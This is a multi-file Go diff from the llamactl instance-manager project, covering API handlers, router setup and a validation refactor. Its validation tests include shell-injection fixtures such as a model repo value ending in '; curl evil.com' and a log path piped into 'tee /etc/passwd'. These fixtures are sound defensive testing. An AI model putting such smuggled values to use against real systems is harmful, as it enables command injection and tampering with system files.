parsedOptions, ok := parseHelper(w, r, &backends.VllmServerOptions{})
if !ok {
return
}
options := &instance.Options{
BackendOptions: backends.Options{
BackendType: backends.BackendTypeVllm,
VllmServerOptions: parsedOptions.(*backends.VllmServerOptions),
},
}
writeJSON(w, http.StatusOK, options)
}
}
// executeLlamaServerCommand executes a llama-server command with the specified flag and returns the output
func (h *Handler) executeLlamaServerCommand(flag, errorMsg string) http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
cmd := exec.Command("llama-server", flag)
output, err := cmd.CombinedOutput()
if err != nil {
writeError(w, http.StatusInternalServerError, "command failed", errorMsg+": "+err.Error())
return
}
writeText(w, http.StatusOK, string(output))
}
}
// LlamaServerHelpHandler godoc
// @Summary Get help for llama server
// @Description Returns the help text for the llama server command
// @Tags Backends
// @Security ApiKeyAuth
// @Produces text/plain
// @Success 200 {string} string "Help text"
// @Failure 500 {string} string "Internal Server Error"
// @Router /api/v1/backends/llama-cpp/help [get]
func (h *Handler) LlamaServerHelpHandler() http.HandlerFunc {
return h.executeLlamaServerCommand("--help", "Failed to get help")
}
// LlamaServerVersionHandler godoc
// @Summary Get version of llama server
// @Description Returns the version of the llama server command
// @Tags Backends
// @Security ApiKeyAuth
// @Produces text/plain
// @Success 200 {string} string "Version information"
// @Failure 500 {string} string "Internal Server Error"
// @Router /api/v1/backends/llama-cpp/version [get]
func (h *Handler) LlamaServerVersionHandler() http.HandlerFunc {
return h.executeLlamaServerCommand("--version", "Failed to get version")
}
// LlamaServerListDevicesHandler godoc
// @Summary List available devices for llama server
// @Description Returns a list of available devices for the llama server
// @Tags Backends
// @Security ApiKeyAuth
// @Produces text/plain
// @Success 200 {string} string "List of devices"
// @Failure 500 {string} string "Internal Server Error"
// @Router /api/v1/backends/llama-cpp/devices [get]
func (h *Handler) LlamaServerListDevicesHandler() http.HandlerFunc {
return h.executeLlamaServerCommand("--list-devices", "Failed to list devices")
}

View File

@@ -0,0 +1,352 @@
package server
import (
"encoding/json"
"fmt"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"llamactl/pkg/validation"
"net/http"
"strconv"
"strings"
"github.com/go-chi/chi/v5"
)
// ListInstances godoc
// @Summary List all instances
// @Description Returns a list of all instances managed by the server
// @Tags Instances
// @Security ApiKeyAuth
// @Produces json
// @Success 200 {array} instance.Instance "List of instances"
// @Failure 500 {string} string "Internal Server Error"
// @Router /api/v1/instances [get]
func (h *Handler) ListInstances() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
instances, err := h.InstanceManager.ListInstances()
if err != nil {
writeError(w, http.StatusInternalServerError, "list_failed", "Failed to list instances: "+err.Error())
return
}
writeJSON(w, http.StatusOK, instances)
}
}
// CreateInstance godoc
// @Summary Create and start a new instance
// @Description Creates a new instance with the provided configuration options
// @Tags Instances
// @Security ApiKeyAuth
// @Accept json
// @Produces json
// @Param name path string true "Instance Name"
// @Param options body instance.Options true "Instance configuration options"
// @Success 201 {object} instance.Instance "Created instance details"
// @Failure 400 {string} string "Invalid request body"
// @Failure 500 {string} string "Internal Server Error"
// @Router /api/v1/instances/{name} [post]
func (h *Handler) CreateInstance() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
name := chi.URLParam(r, "name")
validatedName, err := validation.ValidateInstanceName(name)
if err != nil {
writeError(w, http.StatusBadRequest, "invalid_instance_name", err.Error())
return
}
var options instance.Options
if err := json.NewDecoder(r.Body).Decode(&options); err != nil {
writeError(w, http.StatusBadRequest, "invalid_request", "Invalid request body")
return
}
inst, err := h.InstanceManager.CreateInstance(validatedName, &options)
if err != nil {
writeError(w, http.StatusInternalServerError, "create_failed", "Failed to create instance: "+err.Error())
return
}
writeJSON(w, http.StatusCreated, inst)
}
}
// GetInstance godoc
// @Summary Get details of a specific instance
// @Description Returns the details of a specific instance by name
// @Tags Instances
// @Security ApiKeyAuth
// @Produces json
// @Param name path string true "Instance Name"
// @Success 200 {object} instance.Instance "Instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /api/v1/instances/{name} [get]
func (h *Handler) GetInstance() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
name := chi.URLParam(r, "name")
validatedName, err := validation.ValidateInstanceName(name)
if err != nil {
writeError(w, http.StatusBadRequest, "invalid_instance_name", err.Error())
return
}
inst, err := h.InstanceManager.GetInstance(validatedName)
if err != nil {
writeError(w, http.StatusBadRequest, "invalid_instance", err.Error())
return
}
writeJSON(w, http.StatusOK, inst)
}
}
// UpdateInstance godoc
// @Summary Update an instance's configuration
// @Description Updates the configuration of a specific instance by name
// @Tags Instances
// @Security ApiKeyAuth
// @Accept json
// @Produces json
// @Param name path string true "Instance Name"
// @Param options body instance.Options true "Instance configuration options"
// @Success 200 {object} instance.Instance "Updated instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /api/v1/instances/{name} [put]
func (h *Handler) UpdateInstance() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
name := chi.URLParam(r, "name")
validatedName, err := validation.ValidateInstanceName(name)
if err != nil {
writeError(w, http.StatusBadRequest, "invalid_instance_name", err.Error())
return
}
var options instance.Options
if err := json.NewDecoder(r.Body).Decode(&options); err != nil {
writeError(w, http.StatusBadRequest, "invalid_request", "Invalid request body")
return
}
inst, err := h.InstanceManager.UpdateInstance(validatedName, &options)
if err != nil {
writeError(w, http.StatusInternalServerError, "update_failed", "Failed to update instance: "+err.Error())
return
}
writeJSON(w, http.StatusOK, inst)
}
}
// StartInstance godoc
// @Summary Start a stopped instance
// @Description Starts a specific instance by name
// @Tags Instances
// @Security ApiKeyAuth
// @Produces json
// @Param name path string true "Instance Name"
// @Success 200 {object} instance.Instance "Started instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /api/v1/instances/{name}/start [post]
func (h *Handler) StartInstance() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
name := chi.URLParam(r, "name")
validatedName, err := validation.ValidateInstanceName(name)
if err != nil {
writeError(w, http.StatusBadRequest, "invalid_instance_name", err.Error())
return
}
inst, err := h.InstanceManager.StartInstance(validatedName)
if err != nil {
// Check if error is due to maximum running instances limit
if _, ok := err.(manager.MaxRunningInstancesError); ok {
writeError(w, http.StatusConflict, "max_instances_reached", err.Error())
return
}
writeError(w, http.StatusInternalServerError, "start_failed", "Failed to start instance: "+err.Error())
return
}
writeJSON(w, http.StatusOK, inst)
}
}
// StopInstance godoc
// @Summary Stop a running instance
// @Description Stops a specific instance by name
// @Tags Instances
// @Security ApiKeyAuth
// @Produces json
// @Param name path string true "Instance Name"
// @Success 200 {object} instance.Instance "Stopped instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /api/v1/instances/{name}/stop [post]
func (h *Handler) StopInstance() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
name := chi.URLParam(r, "name")
validatedName, err := validation.ValidateInstanceName(name)
if err != nil {
writeError(w, http.StatusBadRequest, "invalid_instance_name", err.Error())
return
}
inst, err := h.InstanceManager.StopInstance(validatedName)
if err != nil {
writeError(w, http.StatusInternalServerError, "stop_failed", "Failed to stop instance: "+err.Error())
return
}
writeJSON(w, http.StatusOK, inst)
}
}
// RestartInstance godoc
// @Summary Restart a running instance
// @Description Restarts a specific instance by name
// @Tags Instances
// @Security ApiKeyAuth
// @Produces json
// @Param name path string true "Instance Name"
// @Success 200 {object} instance.Instance "Restarted instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /api/v1/instances/{name}/restart [post]
func (h *Handler) RestartInstance() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
name := chi.URLParam(r, "name")
validatedName, err := validation.ValidateInstanceName(name)
if err != nil {
writeError(w, http.StatusBadRequest, "invalid_instance_name", err.Error())
return
}
inst, err := h.InstanceManager.RestartInstance(validatedName)
if err != nil {
writeError(w, http.StatusInternalServerError, "restart_failed", "Failed to restart instance: "+err.Error())
return
}
writeJSON(w, http.StatusOK, inst)
}
}
// DeleteInstance godoc
// @Summary Delete an instance
// @Description Stops and removes a specific instance by name
// @Tags Instances
// @Security ApiKeyAuth
// @Param name path string true "Instance Name"
// @Success 204 "No Content"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /api/v1/instances/{name} [delete]
func (h *Handler) DeleteInstance() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
name := chi.URLParam(r, "name")
validatedName, err := validation.ValidateInstanceName(name)
if err != nil {
writeError(w, http.StatusBadRequest, "invalid_instance_name", err.Error())
return
}
if err := h.InstanceManager.DeleteInstance(validatedName); err != nil {
writeError(w, http.StatusInternalServerError, "delete_failed", "Failed to delete instance: "+err.Error())
return
}
w.WriteHeader(http.StatusNoContent)
}
}
// GetInstanceLogs godoc
// @Summary Get logs from a specific instance
// @Description Returns the logs from a specific instance by name with optional line limit
// @Tags Instances
// @Security ApiKeyAuth
// @Param name path string true "Instance Name"
// @Param lines query string false "Number of lines to retrieve (default: all lines)"
// @Produces text/plain
// @Success 200 {string} string "Instance logs"
// @Failure 400 {string} string "Invalid name format or lines parameter"
// @Failure 500 {string} string "Internal Server Error"
// @Router /api/v1/instances/{name}/logs [get]
func (h *Handler) GetInstanceLogs() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
name := chi.URLParam(r, "name")
validatedName, err := validation.ValidateInstanceName(name)
if err != nil {
writeError(w, http.StatusBadRequest, "invalid_instance_name", err.Error())
return
}
lines := r.URL.Query().Get("lines")
numLines := -1 // Default to all lines
if lines != "" {
parsedLines, err := strconv.Atoi(lines)
if err != nil {
writeError(w, http.StatusBadRequest, "invalid_parameter", "Invalid lines parameter: "+err.Error())
return
}
numLines = parsedLines
}
// Use the instance manager which handles both local and remote instances
logs, err := h.InstanceManager.GetInstanceLogs(validatedName, numLines)
if err != nil {
writeError(w, http.StatusInternalServerError, "logs_failed", "Failed to get logs: "+err.Error())
return
}
writeText(w, http.StatusOK, logs)
}
}
// InstanceProxy godoc
// @Summary Proxy requests to a specific instance, does not autostart instance if stopped
// @Description Forwards HTTP requests to the llama-server instance running on a specific port
// @Tags Instances
// @Security ApiKeyAuth
// @Param name path string true "Instance Name"
// @Success 200 "Request successfully proxied to instance"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Failure 503 {string} string "Instance is not running"
// @Router /api/v1/instances/{name}/proxy [get]
// @Router /api/v1/instances/{name}/proxy [post]
func (h *Handler) InstanceProxy() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
inst, err := h.getInstance(r)
if err != nil {
writeError(w, http.StatusBadRequest, "invalid_instance", err.Error())
return
}
if !inst.IsRunning() {
writeError(w, http.StatusServiceUnavailable, "instance_not_running", "Instance is not running")
return
}
if !inst.IsRemote() {
// Strip the "/api/v1/instances/<name>/proxy" prefix from the request URL
prefix := fmt.Sprintf("/api/v1/instances/%s/proxy", inst.Name)
r.URL.Path = strings.TrimPrefix(r.URL.Path, prefix)
}
// Set forwarded headers
r.Header.Set("X-Forwarded-Host", r.Header.Get("Host"))
r.Header.Set("X-Forwarded-Proto", "http")
// Use instance's ServeHTTP which tracks inflight requests and handles shutting down state
err = inst.ServeHTTP(w, r)
if err != nil {
// Error is already handled in ServeHTTP (response written)
return
}
}
}

View File

@@ -0,0 +1,70 @@
package server
import (
"net/http"
"github.com/go-chi/chi/v5"
)
// NodeResponse represents a node configuration in API responses
type NodeResponse struct {
Address string `json:"address"`
}
// ListNodes godoc
// @Summary List all configured nodes
// @Description Returns a map of all nodes configured in the server (node name -> node config)
// @Tags Nodes
// @Security ApiKeyAuth
// @Produces json
// @Success 200 {object} map[string]NodeResponse "Map of nodes"
// @Failure 500 {string} string "Internal Server Error"
// @Router /api/v1/nodes [get]
func (h *Handler) ListNodes() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
// Convert to sanitized response format (map of name -> NodeResponse)
nodeResponses := make(map[string]NodeResponse, len(h.cfg.Nodes))
for name, node := range h.cfg.Nodes {
nodeResponses[name] = NodeResponse{
Address: node.Address,
}
}
writeJSON(w, http.StatusOK, nodeResponses)
}
}
// GetNode godoc
// @Summary Get details of a specific node
// @Description Returns the details of a specific node by name
// @Tags Nodes
// @Security ApiKeyAuth
// @Produces json
// @Param name path string true "Node Name"
// @Success 200 {object} NodeResponse "Node details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 404 {string} string "Node not found"
// @Failure 500 {string} string "Internal Server Error"
// @Router /api/v1/nodes/{name} [get]
func (h *Handler) GetNode() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
name := chi.URLParam(r, "name")
if name == "" {
writeError(w, http.StatusBadRequest, "invalid_request", "Node name cannot be empty")
return
}
nodeConfig, exists := h.cfg.Nodes[name]
if !exists {
writeError(w, http.StatusNotFound, "not_found", "Node not found")
return
}
// Convert to sanitized response format
nodeResponse := NodeResponse{
Address: nodeConfig.Address,
}
writeJSON(w, http.StatusOK, nodeResponse)
}
}

View File

@@ -0,0 +1,135 @@
package server
import (
"bytes"
"encoding/json"
"io"
"llamactl/pkg/instance"
"llamactl/pkg/validation"
"net/http"
)
// OpenAIListInstancesResponse represents the response structure for listing instances (models) in OpenAI-compatible format
type OpenAIListInstancesResponse struct {
Object string `json:"object"`
Data []OpenAIInstance `json:"data"`
}
// OpenAIInstance represents a single instance (model) in OpenAI-compatible format
type OpenAIInstance struct {
ID string `json:"id"`
Object string `json:"object"`
Created int64 `json:"created"`
OwnedBy string `json:"owned_by"`
}
// OpenAIListInstances godoc
// @Summary List instances in OpenAI-compatible format
// @Description Returns a list of instances in a format compatible with OpenAI API
// @Tags OpenAI
// @Security ApiKeyAuth
// @Produces json
// @Success 200 {object} OpenAIListInstancesResponse "List of OpenAI-compatible instances"
// @Failure 500 {string} string "Internal Server Error"
// @Router /v1/models [get]
func (h *Handler) OpenAIListInstances() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
instances, err := h.InstanceManager.ListInstances()
if err != nil {
writeError(w, http.StatusInternalServerError, "list_failed", "Failed to list instances: "+err.Error())
return
}
openaiInstances := make([]OpenAIInstance, len(instances))
for i, inst := range instances {
openaiInstances[i] = OpenAIInstance{
ID: inst.Name,
Object: "model",
Created: inst.Created,
OwnedBy: "llamactl",
}
}
openaiResponse := OpenAIListInstancesResponse{
Object: "list",
Data: openaiInstances,
}
writeJSON(w, http.StatusOK, openaiResponse)
}
}
// OpenAIProxy godoc
// @Summary OpenAI-compatible proxy endpoint
// @Description Handles all POST requests to /v1/*, routing to the appropriate instance based on the request body. Requires API key authentication via the `Authorization` header.
// @Tags OpenAI
// @Security ApiKeyAuth
// @Accept json
// @Produces json
// @Success 200 "OpenAI response"
// @Failure 400 {string} string "Invalid request body or instance name"
// @Failure 500 {string} string "Internal Server Error"
// @Router /v1/ [post]
func (h *Handler) OpenAIProxy() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
// Read the entire body first
bodyBytes, err := io.ReadAll(r.Body)
if err != nil {
writeError(w, http.StatusBadRequest, "invalid_request", "Failed to read request body")
return
}
r.Body.Close()
// Parse the body to extract instance name
var requestBody map[string]any
if err := json.Unmarshal(bodyBytes, &requestBody); err != nil {
writeError(w, http.StatusBadRequest, "invalid_request", "Invalid request body")
return
}
modelName, ok := requestBody["model"].(string)
if !ok || modelName == "" {
writeError(w, http.StatusBadRequest, "invalid_request", "Instance name is required")
return
}
// Validate instance name at the entry point
validatedName, err := validation.ValidateInstanceName(modelName)
if err != nil {
writeError(w, http.StatusBadRequest, "invalid_instance_name", err.Error())
return
}
// Route to the appropriate inst based on instance name
inst, err := h.InstanceManager.GetInstance(validatedName)
if err != nil {
writeError(w, http.StatusBadRequest, "invalid_instance", err.Error())
return
}
// Check if instance is shutting down before autostart logic
if inst.GetStatus() == instance.ShuttingDown {
writeError(w, http.StatusServiceUnavailable, "instance_shutting_down", "Instance is shutting down")
return
}
if !inst.IsRemote() && !inst.IsRunning() {
err := h.ensureInstanceRunning(inst)
if err != nil {
writeError(w, http.StatusInternalServerError, "instance_start_failed", err.Error())
return
}
}
// Recreate the request body from the bytes we read
r.Body = io.NopCloser(bytes.NewReader(bodyBytes))
r.ContentLength = int64(len(bodyBytes))
// Use instance's ServeHTTP which tracks inflight requests and handles shutting down state
err = inst.ServeHTTP(w, r)
if err != nil {
// Error is already handled in ServeHTTP (response written)
return
}
}
}

View File

@@ -0,0 +1,22 @@
package server
import (
"fmt"
"net/http"
)
// VersionHandler godoc
// @Summary Get llamactl version
// @Description Returns the version of the llamactl command
// @Tags System
// @Security ApiKeyAuth
// @Produces text/plain
// @Success 200 {string} string "Version information"
// @Failure 500 {string} string "Internal Server Error"
// @Router /api/v1/version [get]
func (h *Handler) VersionHandler() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
versionInfo := fmt.Sprintf("Version: %s\nCommit: %s\nBuild Time: %s\n", h.cfg.Version, h.cfg.CommitHash, h.cfg.BuildTime)
writeText(w, http.StatusOK, versionInfo)
}
}

View File

@@ -1,13 +0,0 @@
package server
type OpenAIListInstancesResponse struct {
Object string `json:"object"`
Data []OpenAIInstance `json:"data"`
}
type OpenAIInstance struct {
ID string `json:"id"`
Object string `json:"object"`
Created int64 `json:"created"`
OwnedBy string `json:"owned_by"`
}

View File

@@ -1,14 +1,14 @@
package server
import (
"fmt"
"log"
"github.com/go-chi/chi/v5"
"github.com/go-chi/chi/v5/middleware"
"github.com/go-chi/cors"
httpSwagger "github.com/swaggo/http-swagger"
_ "llamactl/apidocs"
_ "llamactl/docs"
"llamactl/webui"
)
@@ -20,7 +20,7 @@ func SetupRouter(handler *Handler) *chi.Mux {
r.Use(cors.Handler(cors.Options{
AllowedOrigins: handler.cfg.Server.AllowedOrigins,
AllowedMethods: []string{"GET", "POST", "PUT", "DELETE", "OPTIONS"},
AllowedHeaders: []string{"Accept", "Authorization", "Content-Type", "X-CSRF-Token"},
AllowedHeaders: handler.cfg.Server.AllowedHeaders,
ExposedHeaders: []string{"Link"},
AllowCredentials: false,
MaxAge: 300,
@@ -60,6 +60,15 @@ func SetupRouter(handler *Handler) *chi.Mux {
})
})
// Node management endpoints
r.Route("/nodes", func(r chi.Router) {
r.Get("/", handler.ListNodes()) // List all nodes
r.Route("/{name}", func(r chi.Router) {
r.Get("/", handler.GetNode())
})
})
// Instance management endpoints
r.Route("/instances", func(r chi.Router) {
r.Get("/", handler.ListInstances()) // List all instances
@@ -77,7 +86,7 @@ func SetupRouter(handler *Handler) *chi.Mux {
// Llama.cpp server proxy endpoints (proxied to the actual llama.cpp server)
r.Route("/proxy", func(r chi.Router) {
r.HandleFunc("/*", handler.ProxyToInstance()) // Proxy all llama.cpp server requests
r.HandleFunc("/*", handler.InstanceProxy()) // Proxy all llama.cpp server requests
})
})
})
@@ -103,9 +112,54 @@ func SetupRouter(handler *Handler) *chi.Mux {
})
r.Route("/llama-cpp/{name}", func(r chi.Router) {
// Public Routes
// Allow llama-cpp server to serve its own WebUI if it is running.
// Don't auto start the server since it can be accessed without an API key
r.Get("/", handler.LlamaCppUIProxy())
// Private Routes
r.Group(func(r chi.Router) {
if authMiddleware != nil && handler.cfg.Auth.RequireInferenceAuth {
r.Use(authMiddleware.AuthMiddleware(KeyTypeInference))
}
// This handler auto start the server if it's not running
llamaCppHandler := handler.LlamaCppProxy()
// llama.cpp server specific proxy endpoints
r.Get("/props", llamaCppHandler)
// /slots endpoint is secured (see: https://github.com/ggml-org/llama.cpp/pull/15630)
r.Get("/slots", llamaCppHandler)
r.Post("/apply-template", llamaCppHandler)
r.Post("/completion", llamaCppHandler)
r.Post("/detokenize", llamaCppHandler)
r.Post("/embeddings", llamaCppHandler)
r.Post("/infill", llamaCppHandler)
r.Post("/metrics", llamaCppHandler)
r.Post("/props", llamaCppHandler)
r.Post("/reranking", llamaCppHandler)
r.Post("/tokenize", llamaCppHandler)
// OpenAI-compatible proxy endpoint
// Handles all POST requests to /v1/*, including:
// - /v1/completions
// - /v1/chat/completions
// - /v1/embeddings
// - /v1/rerank
// - /v1/reranking
// llamaCppHandler is used here because some users of llama.cpp endpoints depend
// on "model" field being optional, and handler.OpenAIProxy requires it.
r.Post("/v1/*", llamaCppHandler)
})
})
// Serve WebUI files
if err := webui.SetupWebUI(r); err != nil {
fmt.Printf("Failed to set up WebUI: %v\n", err)
log.Printf("Failed to set up WebUI: %v\n", err)
}
return r

View File

@@ -1,5 +1,7 @@
package testutil
import "slices"
// Helper functions for pointer fields
func BoolPtr(b bool) *bool {
return &b
@@ -8,3 +10,23 @@ func BoolPtr(b bool) *bool {
func IntPtr(i int) *int {
return &i
}
// Helper functions for testing command arguments
// Contains checks if a slice contains a specific item
func Contains(slice []string, item string) bool {
return slices.Contains(slice, item)
}
// ContainsFlagWithValue checks if args contains a flag followed by a specific value
func ContainsFlagWithValue(args []string, flag, value string) bool {
for i, arg := range args {
if arg == flag {
// Check if there's a next argument and it matches the expected value
if i+1 < len(args) && args[i+1] == value {
return true
}
}
}
return false
}

View File

@@ -2,8 +2,6 @@ package validation
import (
"fmt"
"llamactl/pkg/backends"
"llamactl/pkg/instance"
"reflect"
"regexp"
)
@@ -24,8 +22,8 @@ var (
type ValidationError error
// validateStringForInjection checks if a string contains dangerous patterns
func validateStringForInjection(value string) error {
// ValidateStringForInjection checks if a string contains dangerous patterns
func ValidateStringForInjection(value string) error {
for _, pattern := range dangerousPatterns {
if pattern.MatchString(value) {
return ValidationError(fmt.Errorf("value contains potentially dangerous characters: %s", value))
@@ -34,83 +32,8 @@ func validateStringForInjection(value string) error {
return nil
}
// ValidateInstanceOptions performs validation based on backend type
func ValidateInstanceOptions(options *instance.CreateInstanceOptions) error {
if options == nil {
return ValidationError(fmt.Errorf("options cannot be nil"))
}
// Validate based on backend type
switch options.BackendType {
case backends.BackendTypeLlamaCpp:
return validateLlamaCppOptions(options)
case backends.BackendTypeMlxLm:
return validateMlxOptions(options)
case backends.BackendTypeVllm:
return validateVllmOptions(options)
default:
return ValidationError(fmt.Errorf("unsupported backend type: %s", options.BackendType))
}
}
// validateLlamaCppOptions validates llama.cpp specific options
func validateLlamaCppOptions(options *instance.CreateInstanceOptions) error {
if options.LlamaServerOptions == nil {
return ValidationError(fmt.Errorf("llama server options cannot be nil for llama.cpp backend"))
}
// Use reflection to check all string fields for injection patterns
if err := validateStructStrings(options.LlamaServerOptions, ""); err != nil {
return err
}
// Basic network validation for port
if options.LlamaServerOptions.Port < 0 || options.LlamaServerOptions.Port > 65535 {
return ValidationError(fmt.Errorf("invalid port range: %d", options.LlamaServerOptions.Port))
}
return nil
}
// validateMlxOptions validates MLX backend specific options
func validateMlxOptions(options *instance.CreateInstanceOptions) error {
if options.MlxServerOptions == nil {
return ValidationError(fmt.Errorf("MLX server options cannot be nil for MLX backend"))
}
if err := validateStructStrings(options.MlxServerOptions, ""); err != nil {
return err
}
// Basic network validation for port
if options.MlxServerOptions.Port < 0 || options.MlxServerOptions.Port > 65535 {
return ValidationError(fmt.Errorf("invalid port range: %d", options.MlxServerOptions.Port))
}
return nil
}
// validateVllmOptions validates vLLM backend specific options
func validateVllmOptions(options *instance.CreateInstanceOptions) error {
if options.VllmServerOptions == nil {
return ValidationError(fmt.Errorf("vLLM server options cannot be nil for vLLM backend"))
}
// Use reflection to check all string fields for injection patterns
if err := validateStructStrings(options.VllmServerOptions, ""); err != nil {
return err
}
// Basic network validation for port
if options.VllmServerOptions.Port < 0 || options.VllmServerOptions.Port > 65535 {
return ValidationError(fmt.Errorf("invalid port range: %d", options.VllmServerOptions.Port))
}
return nil
}
// validateStructStrings recursively validates all string fields in a struct
func validateStructStrings(v any, fieldPath string) error {
// ValidateStructStrings recursively validates all string fields in a struct
func ValidateStructStrings(v any, fieldPath string) error {
val := reflect.ValueOf(v)
if val.Kind() == reflect.Ptr {
val = val.Elem()
@@ -136,21 +59,21 @@ func validateStructStrings(v any, fieldPath string) error {
switch field.Kind() {
case reflect.String:
if err := validateStringForInjection(field.String()); err != nil {
if err := ValidateStringForInjection(field.String()); err != nil {
return ValidationError(fmt.Errorf("field %s: %w", fieldName, err))
}
case reflect.Slice:
if field.Type().Elem().Kind() == reflect.String {
for j := 0; j < field.Len(); j++ {
if err := validateStringForInjection(field.Index(j).String()); err != nil {
if err := ValidateStringForInjection(field.Index(j).String()); err != nil {
return ValidationError(fmt.Errorf("field %s[%d]: %w", fieldName, j, err))
}
}
}
case reflect.Struct:
if err := validateStructStrings(field.Interface(), fieldName); err != nil {
if err := ValidateStructStrings(field.Interface(), fieldName); err != nil {
return err
}
}

View File

@@ -2,9 +2,6 @@ package validation_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/instance"
"llamactl/pkg/testutil"
"llamactl/pkg/validation"
"strings"
"testing"
@@ -58,13 +55,11 @@ func TestValidateInstanceName(t *testing.T) {
}
func TestValidateInstanceOptions_NilOptions(t *testing.T) {
err := validation.ValidateInstanceOptions(nil)
var opts backends.Options
err := opts.ValidateInstanceOptions()
if err == nil {
t.Error("Expected error for nil options")
}
if !strings.Contains(err.Error(), "options cannot be nil") {
t.Errorf("Expected 'options cannot be nil' error, got: %v", err)
}
}
func TestValidateInstanceOptions_PortValidation(t *testing.T) {
@@ -83,14 +78,14 @@ func TestValidateInstanceOptions_PortValidation(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
options := &instance.CreateInstanceOptions{
options := backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
LlamaServerOptions: &backends.LlamaServerOptions{
Port: tt.port,
},
}
err := validation.ValidateInstanceOptions(options)
err := options.ValidateInstanceOptions()
if (err != nil) != tt.wantErr {
t.Errorf("ValidateInstanceOptions(port=%d) error = %v, wantErr %v", tt.port, err, tt.wantErr)
}
@@ -137,14 +132,14 @@ func TestValidateInstanceOptions_StringInjection(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
// Test with Model field (string field)
options := &instance.CreateInstanceOptions{
options := backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
LlamaServerOptions: &backends.LlamaServerOptions{
Model: tt.value,
},
}
err := validation.ValidateInstanceOptions(options)
err := options.ValidateInstanceOptions()
if (err != nil) != tt.wantErr {
t.Errorf("ValidateInstanceOptions(model=%q) error = %v, wantErr %v", tt.value, err, tt.wantErr)
}
@@ -175,14 +170,14 @@ func TestValidateInstanceOptions_ArrayInjection(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
// Test with Lora field (array field)
options := &instance.CreateInstanceOptions{
options := backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
LlamaServerOptions: &backends.LlamaServerOptions{
Lora: tt.array,
},
}
err := validation.ValidateInstanceOptions(options)
err := options.ValidateInstanceOptions()
if (err != nil) != tt.wantErr {
t.Errorf("ValidateInstanceOptions(lora=%v) error = %v, wantErr %v", tt.array, err, tt.wantErr)
}
@@ -194,14 +189,14 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
// Test that injection in any field is caught
tests := []struct {
name string
options *instance.CreateInstanceOptions
options backends.Options
wantErr bool
}{
{
name: "injection in model field",
options: &instance.CreateInstanceOptions{
options: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "safe.gguf",
HFRepo: "microsoft/model; curl evil.com",
},
@@ -210,9 +205,9 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
},
{
name: "injection in log file",
options: &instance.CreateInstanceOptions{
options: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "safe.gguf",
LogFile: "/tmp/log.txt | tee /etc/passwd",
},
@@ -221,9 +216,9 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
},
{
name: "all safe fields",
options: &instance.CreateInstanceOptions{
options: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/model.gguf",
HFRepo: "microsoft/DialoGPT-medium",
LogFile: "/tmp/llama.log",
@@ -237,7 +232,7 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
err := validation.ValidateInstanceOptions(tt.options)
err := tt.options.ValidateInstanceOptions()
if (err != nil) != tt.wantErr {
t.Errorf("ValidateInstanceOptions() error = %v, wantErr %v", err, tt.wantErr)
}
@@ -247,12 +242,9 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
// Test that non-string fields don't interfere with validation
options := &instance.CreateInstanceOptions{
AutoRestart: testutil.BoolPtr(true),
MaxRestarts: testutil.IntPtr(5),
RestartDelay: testutil.IntPtr(10),
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
options := backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Port: 8080,
GPULayers: 32,
CtxSize: 4096,
